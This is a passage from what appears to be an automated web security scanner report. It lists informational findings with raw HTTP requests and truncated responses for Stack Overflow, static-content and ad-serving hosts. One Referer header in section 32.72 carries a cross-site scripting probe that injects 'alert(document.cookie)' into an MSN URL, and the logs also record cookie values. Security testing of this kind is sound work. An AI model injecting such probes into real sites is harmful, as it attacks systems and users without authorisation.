Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.51. http://sstatic.net/js/master.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /js/master.min.js

Request

GET /js/master.min.js?v=e8eb0725b4bd HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.52. http://sstatic.net/js/question.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /js/question.js

Request

GET /js/question.js?v=46e26c3f9a63 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.53. http://sstatic.net/openid.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /openid.css

Request

GET /openid.css?v=3 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.54. http://sstatic.net/stackoverflow/all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /stackoverflow/all.css

Request

GET /stackoverflow/all.css?v=90776b57f91f HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.55. http://sstatic.net/stackoverflow/img/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /stackoverflow/img/favicon.ico

Request

GET /stackoverflow/img/favicon.ico HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.56. http://stackoverflow.com/posts/4843433/ivc/3344

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /posts/4843433/ivc/3344

Request

GET /posts/4843433/ivc/3344 HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.57. http://stackoverflow.com/questions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions

Request

GET /questions HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.58. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Request

GET /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.59. http://stackoverflow.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /tags

Request

GET /tags HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.2.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.60. http://stackoverflow.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users

Request

GET /users HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.3.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.61. http://stackoverflow.com/users/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login

Request

GET /users/login?returnurl=%2fusers HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.62. http://stackoverflow.com/users/login/global/request

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login/global/request

Request

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348; gauthed=1
Content-Length: 0

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.63. http://svtrk.com/vtrk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://svtrk.com
Path:   /vtrk/

Request

GET /vtrk/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=ROS HTTP/1.1
Host: svtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:51:07 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Content-Length: 231
Connection: close
Content-Type: text/html

<html>
<head>
<meta http-equiv="refresh" content="0;url='http://www.news5update.com/consumernewsteeth/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=
...[SNIP]...

32.64. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 30 Jan 2011 01:29:45 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

GIF89a.............!.......,...........D..;

32.65. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=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!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 01:53:17 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:30:07 GMT
Connection: close
Content-Length: 2659

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

32.66. http://redcated/APM/iview/139941180/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/139941180/direct

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1690
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:24:19 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc
...[SNIP]...

32.67. http://redcated/APM/iview/148848786/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1691
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:59 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.MSNMEN/B3889285.6;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesr
...[SNIP]...

32.68. http://redcated/BEL/iview/262582811/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /BEL/iview/262582811/direct

Request

GET /BEL/iview/262582811/direct;/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 232
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/184054348/262582811/direct/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.redcated/b/SBBELSHARSBU/MSN
...[SNIP]...

32.69. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7201
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:29:43 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...

32.70. http://redcated/CNT/iview/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6730
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:51 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...

32.71. http://redcated/CNT/iview/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/299297287/direct

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 261
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:26:37 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.a
...[SNIP]...

32.72. http://redcated/NYC/iview/264935949/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6554
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 13:00:29 GMT

<html>
<head>
<title>BND_Coffee2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-wi
...[SNIP]...

32.73. http://redcated/ULA/iview/296652509/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Request

GET /ULA/iview/296652509/direct;/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6153
Content-Type: text/html
Expires: 0
